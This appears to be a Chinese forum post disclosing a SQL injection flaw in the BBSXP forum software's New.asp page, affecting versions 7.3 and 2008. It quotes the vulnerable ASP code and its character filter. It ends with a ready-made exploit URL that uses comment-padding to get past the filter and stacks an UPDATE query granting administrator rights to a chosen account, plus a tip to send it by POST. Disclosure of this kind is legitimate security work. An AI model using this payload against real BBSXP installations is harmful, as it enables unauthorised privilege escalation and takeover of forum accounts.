BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
受影响系统:<br />BBSXP7.3<br />
BBSXP2008
漏洞文件:<br />
New.asp
代码分析:
Sort=HTMLEncode(Request("Sort")) //第24行
if Sort = empty then<br />
SqlSort="ThreadID"<br />
else<br />
SqlSort=Sort<br />
end if<br />
。。。。。。<br />
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行
过滤函数HTMLEncode 在文件BBSXP_Class.asp中:<br />
Function HTMLEncode(fString)<br />
fString=Replace(fString,CHR(9),"")<br />
fString=Replace(fString,CHR(13),"")<br />
fString=Replace(fString,CHR(22),"")<br />
fString=Replace(fString,CHR(38),"&#38;") '“&”<br />
fString=Replace(fString,CHR(32),"&#32;") '“ ”<br />
fString=Replace(fString,CHR(34),"&quot;") '“"”<br />
fString=Replace(fString,CHR(39),"&#39;") '“'”<br />
fString=Replace(fString,CHR(42)&CHR(42),"&#42;&#42;") '“**”/**/<br />
fString=Replace(fString,CHR(44),"&#44;") '“,”<br />
fString=Replace(fString,CHR(45)&CHR(45),"&#45;&#45;") '“--”<br />
fString=Replace(fString,CHR(60),"&#60;") '“<”<br />
fString=Replace(fString,CHR(62),"&#62;") '“>”<br />
fString=Replace(fString,CHR(92),"&#92;") '“\”<br />
fString=Replace(fString,CHR(59),"&#59;") '“;”<br />
fString=Replace(fString,CHR(10),"<br>")<br />
fString=ReplaceText(fString,"([&#])(*)&#59;","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi<br />
fString=escape(fString)<br />
fString=ReplaceText(fString,"%u30()","&#x30$1;")<br />
fString=unescape(fString)<br />
end if
HTMLEncode=fString<br />
End Function<br />
HTMLEncode过滤了Tab键,空格,** .<br />
变量SqlSort过滤不严导致sql注入漏洞的产生。
漏洞测试:<br />
http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid<br />
成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)
<br />
頁:
[1]